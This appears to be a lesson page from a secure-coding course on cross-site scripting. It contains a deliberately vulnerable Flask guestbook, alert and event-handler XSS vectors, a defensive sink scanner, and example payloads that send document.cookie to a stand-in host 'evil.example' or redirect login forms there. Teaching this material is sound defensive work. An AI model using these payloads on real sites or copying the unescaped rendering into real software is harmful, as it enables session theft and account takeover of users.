PY-L8-32 · A07 — XSS: Cross-Site Scripting Attack

Learning Goals

3 min

By the end of this lesson you can:

Explain XSS as injection into the browser's HTML/JS context.
Distinguish stored, reflected, and DOM-based XSS.
Demonstrate a stored-XSS payload on a deliberately vulnerable local app.
Describe the impact (session theft, defacement) — defence is next lesson.

⚠️ Local, deliberately-broken demo only

The XSS payloads here run against a tiny Flask app you write and run on 127.0.0.1, with your own browser. Injecting scripts into any site you don't own is an attack on its real users — illegal and harmful. We demo locally to understand the mechanism and build the defence (Lesson 33).

Warm-Up · The Comment That Runs Code

5 min

A comment form stores whatever you type and shows it to all visitors.
You post:   <script>alert('XSS')</script>
The server saves it, then renders it into the page HTML unescaped.
Every visitor's browser now RUNS your script as if the site wrote it.

Today's big idea

XSS is injection — but the interpreter is the browser, not the database. When a web app inserts untrusted input into a page without escaping it, the input can include <script> (or event handlers, etc.) that the browser executes in the victim's session. Same root cause as SQLi (untrusted data crossing into a code context — Lesson 2), different victim: your users' browsers. And because it runs as your site, it can steal sessions, keystrokes, and more.

New Concept · The Three Types & The Impact

14 min

The vulnerable pattern

from flask import Flask, request
app = Flask(__name__)
comments = []

# VULNERABLE — user input rendered into HTML without escaping
@app.post("/comment")
def add_comment():
    comments.append(request.form["text"])     # store raw input
    return "saved"

@app.get("/comments")
def show():
    # f-string-building HTML from raw input → XSS sink
    return "<h1>Comments</h1>" + "".join(f"<p>{c}</p>" for c in comments)

Any place raw input lands in HTML/JS unescaped is an XSS sink: f-string HTML, innerHTML = userInput, Jinja's | safe filter, React's dangerouslySetInnerHTML, or marking a string "safe" when it isn't.

The three types

STORED (persistent)   payload saved server-side, served to EVERY visitor
                      e.g. a malicious comment → worst, widest blast radius
REFLECTED             payload in a URL/param, reflected back in the response
                      e.g. search?q=<script>... in a link sent to a victim
DOM-BASED             client-side JS writes untrusted data into the DOM
                      e.g. element.innerHTML = location.hash

Stored XSS is the most dangerous (it hits everyone automatically); reflected XSS needs the victim to click a crafted link; DOM XSS lives entirely in front-end JS.

What an XSS payload can do

<!-- runs in the VICTIM's browser, AS your trusted site: -->
<script>fetch('https://evil.example/steal?c=' + document.cookie)</script>
<!-- steals the session cookie → attacker logs in as the victim -->

<script>document.querySelector('form').action = 'https://evil.example'</script>
<!-- redirects the login form to harvest credentials -->

Why XSS is so damaging

The script runs with your site's full privileges in the victim's session. It can steal session cookies (account takeover), keylog, perform actions as the user (transfer money, change settings), deface the page, or spread (an XSS worm). One unescaped field can compromise every visitor.

The defence is a teaser, and it's two parts

The fix (Lesson 33): escape output by context (HTML-escape so <script> becomes harmless text), and a Content Security Policy that tells the browser not to run inline/untrusted scripts. Modern frameworks auto-escape by default — XSS usually appears when you opt out of that protection.

Worked Example · Stored XSS in a Local Demo

12 min

Goal: a tiny local comment app with a stored-XSS bug; post a (harmless) payload and watch it execute in your own browser — proving the mechanism. Your machine only.

# vulnerable_xss.py — DELIBERATELY broken; run locally only
from flask import Flask, request
app = Flask(__name__)
comments = []

PAGE = """<!doctype html><h1>Guestbook</h1>
<form method=post action=/comment>
  <input name=text><button>post</button></form>
{rendered}"""

@app.post("/comment")
def add():
    comments.append(request.form["text"])         # store raw (vulnerable)
    return PAGE.format(rendered=render())

@app.get("/")
def index():
    return PAGE.format(rendered=render())

def render():
    # ✗ raw input concatenated into HTML → stored XSS sink
    return "".join(f"<div class=comment>{c}</div>" for c in comments)

if __name__ == "__main__":
    app.run(port=5000)      # http://127.0.0.1:5000 — your machine

# In YOUR browser at 127.0.0.1:5000, post this comment:
<script>alert('XSS — this runs as the site')</script>

# Result: every time the page loads, the alert fires — your script
# is now part of the page, executing in every visitor's browser.
# A real attacker would post:  <script>fetch('//evil/?c='+document.cookie)</script>
# (we use a harmless alert; never deploy this app).

Read the code

The bug is the one line in render(): raw comment text is concatenated straight into HTML. When you post <script>...</script>, the server stores it and serves it back inside the page, so the browser parses it as a real script tag and runs it — for every visitor (stored XSS). Note the parallel to SQLi: untrusted input crossed a boundary into a code context (HTML/JS instead of SQL). The harmless alert stands in for what a real payload would do (cookie theft). Next lesson, escaping this one output turns <script> into visible, inert text.

Try It Yourself

13 min

Your own local demo or OWASP Juice Shop's XSS challenges (Lesson 27) — safe, intentional targets. Use harmless payloads (alert), never real cookie-stealing endpoints.

01 🟢 Trigger stored XSS

Run the demo and post a harmless <script>alert(1)</script>. Confirm it executes on page load. View the page source to see your script embedded in the HTML.

02 🟡 Reflected variant

Add a search route that reflects ?q=... back into the page unescaped. Confirm a payload in the URL executes — and note that this needs the victim to open a crafted link (vs. stored, which is automatic).

Hint

@app.get("/search")
def search():
    q = request.args.get("q", "")
    return f"<p>Results for: {q}</p>"     # ✗ reflected XSS
# /search?q=<script>alert('reflected')</script>

03 🔴 Non-script payloads

Show that XSS isn't only <script>: trigger script execution via an event handler attribute (e.g. <img src=x onerror=alert(1)>). Explain why blacklisting the word "script" is a useless defence (a teaser for proper output encoding).

Hint

<img src=x onerror=alert(1)>     ← no <script> tag, still runs JS
<svg onload=alert(1)>
<a href="javascript:alert(1)">x</a>
→ there are dozens of vectors. Blacklisting can't cover them all;
  CONTEXT-AWARE OUTPUT ESCAPING (next lesson) neutralises all of them.

Mini-Challenge · An XSS Sink Finder

8 min

Build a static scanner that flags likely XSS sinks in a codebase: Jinja | safe, Markup(...), f-strings/concatenation building HTML from variables, JS innerHTML =, and React dangerouslySetInnerHTML. Report file + line, since each is a place auto-escaping was bypassed.

Show a sample solution

import re
from pathlib import Path

SINKS = {
    "Jinja | safe": re.compile(r"\|\s*safe"),
    "Markup()":      re.compile(r"Markup\("),
    "innerHTML":     re.compile(r"\.innerHTML\s*="),
    "dangerouslySetInnerHTML": re.compile(r"dangerouslySetInnerHTML"),
    "f-string HTML": re.compile(r"f['\"]<[^>]*\{"),   # f"<p>{x}" style
}

def scan(path: str) -> None:
    for n, line in enumerate(Path(path).read_text(encoding="utf-8").splitlines(), 1):
        for name, pat in SINKS.items():
            if pat.search(line):
                print(f"{path}:{n}: ⚠️ XSS sink ({name}) — ensure output is "
                      f"escaped for its context")
                print(f"    {line.strip()}")

scan("templates_or_views.py")
# Each hit = auto-escaping bypassed → verify the data is trusted/escaped.

Non-negotiables: flags the common framework escape-bypasses, reports file:line, frames each as "auto-escaping bypassed — verify."

Recap

3 min

XSS is injection into the browser: untrusted input rendered into a page without escaping becomes executable script in your visitors' sessions. Stored (saved, served to all — worst), reflected (in a URL, needs a click), and DOM-based (client-side JS). It can steal session cookies, act as the user, deface, and spread. The sink is any unescaped output of user data into HTML/JS — and it's not just <script> (event handlers, javascript: URLs, etc.), so blacklisting fails. We demonstrated stored XSS on a local app with a harmless alert; the real defence — context-aware output escaping + a Content Security Policy — is next lesson.

Vocabulary Card

XSS: Cross-Site Scripting — running attacker JS in victims' browsers via unescaped output.
stored vs reflected: Persisted & served to all vs. reflected from a request (needs a click).
XSS sink: Where untrusted data is written into HTML/JS unescaped.
session theft: Stealing the session cookie to impersonate the victim — a top XSS payload.

Homework

4 min

On your local demo (or Juice Shop), trigger a stored XSS and a reflected XSS with harmless alert payloads, and view the source to see your input embedded in the HTML. Demonstrate at least one non-<script> vector. Build the XSS-sink scanner and run it on a project. Write a paragraph: why XSS is "injection into the browser," what a real payload would steal, and why you only ever test this on your own/authorised targets.

Sample · XSS explainer

XSS is "injection into the browser": just as SQLi makes the DATABASE
run attacker input as SQL, XSS makes the BROWSER run attacker input as
JavaScript. The cause is identical — untrusted data placed into a code
context (here, HTML/JS) without escaping. The victim is different: my
site's visitors, in their own logged-in sessions.

What a real payload would steal: the session cookie
(<script>fetch('//evil/?c='+document.cookie)</script>) → the attacker
pastes it into their browser and is now logged in AS the victim. It
could also keylog, submit forms as the user, or deface the page. I
used a harmless alert(1) in testing.

Why only my own targets: a working XSS attacks real PEOPLE (the site's
users), not just a server — injecting scripts into a site I don't own
harms its visitors and is illegal. I test on my local demo and Juice
Shop's XSS challenges, which are built for exactly this.

Non-negotiables: reproduced stored + reflected XSS (harmless payloads) on a local/authorised target, a non-script vector, the scanner, and a clear mechanism + ethics explanation.

A comment form stores whatever you type and shows it to all visitors. You post: <script>alert('XSS')</script> The server saves it, then renders it into the page HTML unescaped. Every visitor's browser now RUNS your script as if the site wrote it.

from flask import Flask, request app = Flask(__name__) comments = [] # VULNERABLE — user input rendered into HTML without escaping @app.post("/comment") def add_comment(): comments.append(request.form["text"]) # store raw input return "saved" @app.get("/comments") def show(): # f-string-building HTML from raw input → XSS sink return "<h1>Comments</h1>" + "".join(f"<p>{c}</p>" for c in comments)

STORED (persistent) payload saved server-side, served to EVERY visitor e.g. a malicious comment → worst, widest blast radius REFLECTED payload in a URL/param, reflected back in the response e.g. search?q=<script>... in a link sent to a victim DOM-BASED client-side JS writes untrusted data into the DOM e.g. element.innerHTML = location.hash

<script>fetch('https://evil.example/steal?c=' + document.cookie)</script>  <script>document.querySelector('form').action = 'https://evil.example'</script>

# vulnerable_xss.py — DELIBERATELY broken; run locally only from flask import Flask, request app = Flask(__name__) comments = [] PAGE = """<!doctype html><h1>Guestbook</h1> <form method=post action=/comment> <input name=text><button>post</button></form> {rendered}""" @app.post("/comment") def add(): comments.append(request.form["text"]) # store raw (vulnerable) return PAGE.format(rendered=render()) @app.get("/") def index(): return PAGE.format(rendered=render()) def render(): # ✗ raw input concatenated into HTML → stored XSS sink return "".join(f"<div class=comment>{c}</div>" for c in comments) if __name__ == "__main__": app.run(port=5000) # http://127.0.0.1:5000 — your machine

# In YOUR browser at 127.0.0.1:5000, post this comment: <script>alert('XSS — this runs as the site')</script> # Result: every time the page loads, the alert fires — your script # is now part of the page, executing in every visitor's browser. # A real attacker would post: <script>fetch('//evil/?c='+document.cookie)</script> # (we use a harmless alert; never deploy this app).

<img src=x onerror=alert(1)> ← no <script> tag, still runs JS <svg onload=alert(1)> <a href="javascript:alert(1)">x</a> → there are dozens of vectors. Blacklisting can't cover them all; CONTEXT-AWARE OUTPUT ESCAPING (next lesson) neutralises all of them.

import re from pathlib import Path SINKS = { "Jinja | safe": re.compile(r"\|\s*safe"), "Markup()": re.compile(r"Markup\("), "innerHTML": re.compile(r"\.innerHTML\s*="), "dangerouslySetInnerHTML": re.compile(r"dangerouslySetInnerHTML"), "f-string HTML": re.compile(r"f['\"]<[^>]*\{"), # f"<p>{x}" style } def scan(path: str) -> None: for n, line in enumerate(Path(path).read_text(encoding="utf-8").splitlines(), 1): for name, pat in SINKS.items(): if pat.search(line): print(f"{path}:{n}: ⚠️ XSS sink ({name}) — ensure output is " f"escaped for its context") print(f" {line.strip()}") scan("templates_or_views.py") # Each hit = auto-escaping bypassed → verify the data is trusted/escaped.